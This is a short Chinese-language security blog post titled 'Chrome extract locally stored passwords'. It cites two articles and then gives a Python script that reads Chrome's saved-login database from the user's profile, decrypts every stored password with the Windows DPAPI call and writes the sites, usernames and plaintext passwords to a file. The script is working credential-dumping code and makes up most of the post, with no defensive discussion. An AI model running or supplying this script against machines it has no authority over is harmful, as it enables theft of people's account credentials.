Neurohazard
Our democracy have been h4ck3d.

Chrome 提取本地存储密码

wpadmin~April 6, 2019 /InfoSec

Chrome 提取本地存储密码

参考资料

用12行代码提取浏览器自动保存的密码
https://nosec.org/home/detail/2435.html

Why You Should Never Save Passwords on Chrome or Firefox
https://hackernoon.com/why-you-should-never-save-passwords-on-chrome-or-firefox-96b770cfd0d0?gi=4173a6531900

获取密码

# -*- encoding:utf-8 -*-
# os and sqlite3 ships with Python by default. If you get import errors for win32crypt use "pip install pypiwin32" to install the dependency.

import os, sqlite3, win32crypt

import sys
reload(sys)
sys.setdefaultencoding('utf-8')

# Automatically get the logged in user's default folder

data = os.path.expanduser('~')+r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"

# Connect to Login Data databa se

connection = sqlite3.connect(data)
cursor = connection.cursor()

# Query the values of interest to us

cursor.execute('SELECT action_url, username_value, password_value FROM logins')
final_data = cursor.fetchall()
cursor.close()

# print("Found {} passwords...").format(str(len(final_data)))
write_file=open("chrome.txt","w")
write_file.write("User login data extracted: \n\n")

# Iterating through all the values found...

for chrome_logins in final_data:
  password = win32crypt.CryptUnprotectData(chrome_logins[2], None, None, None, 0)[1]
  site = "Website: " + str(chrome_logins[0])
  username = "Username: " + str(chrome_logins[1])
  password = "Password: " + str(password)
  write_file.write(site+"\n"+username+"\n"+password)
  write_file.write("\n"+"======"*10+"\n")
print("Saved to chrome.txt")

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.